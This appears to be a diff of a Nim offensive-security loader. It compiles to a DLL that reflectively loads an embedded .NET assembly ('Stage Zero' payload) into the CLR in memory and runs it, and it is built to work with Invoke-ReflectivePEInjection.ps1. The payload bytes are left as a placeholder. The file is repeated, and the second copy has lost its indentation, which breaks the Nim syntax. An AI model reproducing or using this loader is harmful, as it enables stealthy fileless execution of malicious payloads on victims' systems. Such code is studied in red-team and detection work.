ChoiSG · February 4, 2022 16:13
diff --git a/execute_assembly_bin.nim b/execute_assembly_bin.nim
 #[
    Author: Marcello Salvati, Twitter: @byt3bl33d3r
    License: BSD 3-Clause
    I still can't believe this was added directly in the Winim library. Huge props to the author of Winim for this (khchen), really great stuff.
    Make sure you have Winim >=3.6.0 installed. If in doubt do a `nimble install winim`
    Also see https://github.com/khchen/winim/issues/63 for an amazing pro-tip from the author of Winim in order to determine the marshalling type of .NET objects.
    References:
      - https://github.com/khchen/winim/blob/master/examples/clr/usage_demo2.nim
 ]#

 #[
    Compile: nim c -d=mingw -d:danger -d:strip --opt:size --app=lib --nomain --cpu=amd64 --passL:-Wl,--dynamicbase .\execute_assembly_bin.nim
    Modified to be compatible with BC-Security's Invoke-ReflectivePEInjection.ps1 script 
 ]#

 import winim/clr
 import winim/lean
 import sugar
 import strformat

 # Stage Zero .Net assembly w/ DInvoke - Created with CSharptoNimByteArray by @s3cur3th1ssh1t
 # Put your buf Nim byte array here 
 # It should be like ` var buf: array[31337, byte] = [byte 0x4D, etc, etc, .....] ` 

 proc NimMain() {.cdecl, importc.}

 proc DllMain(hinstDLL: HINSTANCE, fdwReason: DWORD, lpvReserved: LPVOID) : BOOL {.stdcall, exportc, dynlib.} =
  NimMain()

  return true

 # This exported function is going to be triggered. Name VoidFunc came from Invoke-ReflectivePEInjection's README.
 proc VoidFunc() : void {.stdcall,exportc,dynlib.} = 
    # Always have this at exported functions that's being used - or the process explodes! (according to byt3bl33d3r)
    NimMain() 

    for v in clrVersions():
        echo fmt"    \--- {v}"
    echo "\n"

    var assembly = load(buf)
    dump assembly

    var arr = toCLRVariant([""], VT_BSTR) # Passing no arguments
    assembly.EntryPoint.Invoke(nil, toCLRVariant([arr]))
	#[
	Author: Marcello Salvati, Twitter: @byt3bl33d3r
	License: BSD 3-Clause
	I still can't believe this was added directly in the Winim library. Huge props to the author of Winim for this (khchen), really great stuff.
	Make sure you have Winim >=3.6.0 installed. If in doubt do a `nimble install winim`
	Also see https://github.com/khchen/winim/issues/63 for an amazing pro-tip from the author of Winim in order to determine the marshalling type of .NET objects.
	References:
	- https://github.com/khchen/winim/blob/master/examples/clr/usage_demo2.nim
	]#

	#[
	Compile: nim c -d=mingw -d:danger -d:strip --opt:size --app=lib --nomain --cpu=amd64 --passL:-Wl,--dynamicbase .\execute_assembly_bin.nim
	Modified to be compatible with BC-Security's Invoke-ReflectivePEInjection.ps1 script
	]#

	import winim/clr
	import winim/lean
	import sugar
	import strformat

	# Stage Zero .Net assembly w/ DInvoke - Created with CSharptoNimByteArray by @s3cur3th1ssh1t
	# Put your buf Nim byte array here
	# It should be like ` var buf: array[31337, byte] = [byte 0x4D, etc, etc, .....] `

	proc NimMain() {.cdecl, importc.}

	proc DllMain(hinstDLL: HINSTANCE, fdwReason: DWORD, lpvReserved: LPVOID) : BOOL {.stdcall, exportc, dynlib.} =
	NimMain()

	return true

	# This exported function is going to be triggered. Name VoidFunc came from Invoke-ReflectivePEInjection's README.
	proc VoidFunc() : void {.stdcall,exportc,dynlib.} =
	# Always have this at exported functions that's being used - or the process explodes! (according to byt3bl33d3r)
	NimMain()

	for v in clrVersions():
	echo fmt" \--- {v}"
	echo "\n"

	var assembly = load(buf)
	dump assembly

	var arr = toCLRVariant([""], VT_BSTR) # Passing no arguments
	assembly.EntryPoint.Invoke(nil, toCLRVariant([arr]))